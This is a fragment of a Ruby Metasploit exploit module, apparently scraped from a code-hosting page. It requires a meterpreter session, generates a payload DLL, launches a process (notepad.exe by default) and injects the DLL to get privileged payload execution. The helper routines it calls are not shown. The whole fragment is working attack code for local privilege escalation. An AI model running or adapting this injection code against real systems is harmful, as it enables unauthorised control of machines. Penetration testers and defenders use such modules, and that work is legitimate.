fail_with(Failure::None, 'Only meterpreter sessions are supported')
|
||||
end
|
||||
|
||||
payload_dll = generate_payload_dll
|
||||
process_name = datastore['PROCESS'] || 'notepad.exe'
|
||||
|
||||
print_status('Checking target...')
|
||||
unless validate_active_host
|
||||
raise Msf::Exploit::Failed, 'Could not connect to session'
|
||||
end
|
||||
validate_target
|
||||
|
||||
print_status("Target Looks Good... trying to start #{process_name}")
|
||||
process = setup_process(process_name)
|
||||
inject_magic(process, payload_dll)
|
||||
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
print_error(e.message)
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue